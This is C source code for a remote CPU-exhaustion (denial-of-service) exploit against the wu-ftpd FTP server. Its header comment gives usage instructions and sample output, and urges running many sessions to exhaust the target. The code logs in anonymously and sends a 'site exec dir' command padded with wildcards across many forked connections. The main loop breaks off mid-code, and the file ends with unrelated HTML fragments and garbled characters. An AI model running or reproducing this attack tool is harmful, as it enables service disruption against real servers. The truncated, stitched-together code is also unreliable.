/* * Exploit for wu-ftpd all versions by pi3 (pi3ki31ny). * * How to use? To saw effect you can run only one process this exploit. Example: * * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# cc p_wu.c -o p_wu * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu * * * ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::... * * [*] Ussage: ./p_wu [options] * * Options: * * -v * -o [ port - standard -> 21 ] * -l [ login - standard -> ftp ] * -p [ password - standard -> daj@na.wino ] * -i [ how many connections - standard -> 15 ] * -c [ directory - standard -> don't change ] * -h This stupid help screen... * * * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ./p_wu -v 0 * * * ...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) ]=- :::... * * [*] Connected to: 0 * [*] Banner: 220 darkstar.example.net FTP server (Version wu-2.6.2(1) Fri Oct 22 02:54:53 CEST 2004) ready. * [*] Sending USER: ftp... OK! * [*] Sending PASS: daj@na.wino... OK! * [*] Sending evil command... OK! < 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 > * * * root@dpi3:~/root/all/IsP/projekty/sploity/wu-ftpd# ps aux |grep ftpd * ftp 1592 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1594 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1596 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1598 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1600 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1602 7.1 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1604 6.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1606 6.7 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1608 6.5 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1610 6.3 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1612 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1614 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1616 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1618 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * ftp 1620 5.9 0.8 2032 1056 ? R 05:01 0:05 ftpd: localhost: * root@pi3:~/root/all/IsP/projekty/sploity/wu-ftpd# * * And what we can saw wu-ftpd ate all free CPU power... but this do only 15 connections. * Very good effect i have with running ~20 - ~30 sesion after that my system will * work very slow (i can't do in practical nothink! - use option -i to change how many times sploit * will be connect to server and use bug). * * Btw. Try always to change directory where is more files / directories it's better for sploit ;-) * * Ok. Thanks for read this shit and let's go to ate CPU power! ;-) * * Special greetz: appelast * Greetz: [greetz on my web] && other my friends (you know who you are) * * ...::: -=[ www.pi3.int.pl ]=- :::... */ #include #include #include #include #include #include #include #include #include #include #define TRUE 1 #define FALSE 0 #define FAL_EX -1 #define BUFS 210 #define PORT 21 #define LOGN "ftp" #define PASS "daj@na.wino" #define SA struct sockaddr #define pi3 TRUE int vrfy(int mode, char *ans) { if (mode == 1) { if(!strncmp(ans, "331", 3)) return TRUE; else return FALSE; } if (mode == 2) { if(!strncmp(ans, "230", 3)) return TRUE; else return FALSE; } if (mode == 3) { if(!strncmp(ans, "200", 3)) return TRUE; else return FALSE; } if (mode == 4) { if(!strncmp(ans, "250", 3)) return TRUE; else return FALSE; } } void ussage(char *arg) { printf("\n\n\t...::: -=[ Remote eating CPU power in wu-ftpd by pi3 (pi3ki31ny) \ ]=- :::...\n"); printf("\n\t\t[*] Ussage: %s [options]\n\n",arg); printf("\tOptions:\n\n"); printf("\t\t-v \n"); printf("\t\t-o [ port - standard -> 21 ]\n"); printf("\t\t-l [ login - standard -> ftp ]\n"); printf("\t\t-p [ password - standard -> daj@na.wino ]\n"); printf("\t\t-i [ how many connections - standard -> 15 ]\n"); printf("\t\t-c [ directory - standard -> don\'t change ]\n"); printf("\t\t-h This stupid help screen...\n\n\n"); exit(FAL_EX); } int main(int argc, char *argv[]) { char buf[BUFS],line[100],tmp_buf[200],*login=LOGN,*pass=PASS,*victim=NULL,*cwd=NULL; long inet; int pid,sockfd,i,port=PORT,opt=FALSE,ret_vrfy=FALSE,tmp,howmuch=15; struct sockaddr_in servaddr; struct hostent *h; if (argc<2) ussage(argv[FALSE]); while((opt = getopt(argc,argv,"v:o:l:p:c:i:h")) != FAL_EX) { switch(opt) { case 'v': victim=optarg; if ( (h=gethostbyname((char*)optarg)) == NULL) { printf("Gethostbyname() field!\n"); exit(FAL_EX); } memcpy (&inet, h->h_addr, 4); break; case 'o': port=atoi(optarg); break; case 'l': login=optarg; break; case 'p': pass=optarg; break; case 'c': cwd=optarg; break; case 'i': howmuch=atoi(optarg); break; case 'h': default: ussage(argv[FALSE]); break; } } servaddr.sin_family = AF_INET; servaddr.sin_port = htons(port); servaddr.sin_addr.s_addr = htonl(INADDR_ANY); bzero(buf,sizeof(buf)); strcpy(buf,"site exec dir "); for (i=FALSE;i<192;i++) buf[14+i] = '*'; strcat(buf,".*\n"); for (tmp=FALSE;tmp\n\n\n"); return pi3; }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß